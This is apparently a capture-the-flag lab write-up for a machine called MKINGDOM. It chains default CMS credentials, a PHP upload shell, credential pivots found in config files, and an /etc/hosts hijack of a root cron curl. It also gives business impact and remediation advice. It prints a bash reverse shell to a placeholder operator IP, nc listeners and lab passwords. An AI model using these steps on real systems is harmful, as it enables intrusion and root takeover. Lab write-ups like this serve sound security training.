CMS upload RCE, credential pivots, and hosts-file curl hijack
Foundations Linux engagement: castle CMS on port 85 accepted a PHP upload after allowlisting; database and env secrets pivoted toad→mario; rewriting /etc/hosts hijacked a root curl of counter.sh for a reverse shell.
- Case files
- CMS upload RCE, credential pivots, and hosts-file curl hijack
Default CMS credentials and a loosened upload allowlist yielded www-data. toad and mario passwords from config/env enabled lateral movement; root’s scheduled curl trusted mkingdom.thm, which we pointed at our listener.
admin/password authenticated; allowing php uploads and triggering the shell caught www-data.
database.php and a base64 env token unlocked toad then mario.
Pointed mkingdom.thm at the attacker, served counter.sh with a reverse shell, and caught root.
Engagement summary
Default CMS credentials and a loosened upload allowlist yielded www-data. toad and mario passwords from config/env enabled lateral movement; root’s scheduled curl trusted mkingdom.thm, which we pointed at our listener.
MKINGDOM (10.48.134.165) exposed only Apache on port 85. /app/castle was a Concrete5-style CMS with admin/password. File Settings allowed php uploads; a reverse shell landed as www-data. database.php held toad:toadisthebest; an environment token base64-decoded to ikaTeNTANtES for mario. pspy showed root curling http://mkingdom.thm:85/app/castle/application/counter.sh. Editing /etc/hosts to our attacker IP and serving a malicious counter.sh on port 85 returned a root reverse shell when the job fired.
Business impact
Default CMS passwords and PHP upload allowlists are RCE. Secrets in web configs enable lateral movement. Root jobs that curl hostnames resolvable via user-writable /etc/hosts are remote root. Enforce strong CMS auth, block executable uploads, and pin root fetch URLs to IPs or signed internal endpoints.
Castle CMS upload RCE
admin/password authenticated; allowing php uploads and triggering the shell caught www-data.
OPERATOR · CMS
savvy@lab:~$ nmap -sV 10.48.134.165
85/tcp open http Apache httpd 2.4.7
savvy@lab:~$ dirsearch -u http://10.48.134.165:85
/app/castle
# login admin/password → File Settings allow php → upload reverse shell
savvy@lab:~$ nc -lnvp 1234
savvy@lab:/var/www/html$
toad and mario credential pivots
database.php and a base64 env token unlocked toad then mario.
OPERATOR · LATERAL
savvy@lab:~$ grep -E 'user|pass' /var/www/html/app/castle/application/config/database.php
toad / toadisthebest
savvy@lab:~$ su toad
savvy@lab:~$ echo aWthVGVOVEFOdEVTCg== | base64 -d
ikaTeNTANtES
savvy@lab:~$ su mario
savvy@lab:~$
Hosts hijack of root curl
Pointed mkingdom.thm at the attacker, served counter.sh with a reverse shell, and caught root.
PAYLOAD
counter.sh
#!/bin/bash
bash -i >& /dev/tcp/OPERATOR_IP/4444 0>&1OPERATOR · ROOT
# pspy: root curl mkingdom.thm:85/.../counter.sh
savvy@lab:~$ # edit /etc/hosts: mkingdom.thm → OPERATOR_IP
savvy@lab:~$ sudo python3 -m http.server 85
savvy@lab:~$ nc -lnvp 4444
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Rotate CMS and OS passwords; disable PHP uploads. Make /etc/hosts immutable for unprivileged users or use a managed resolver. Fetch automation scripts over authenticated channels with integrity checks.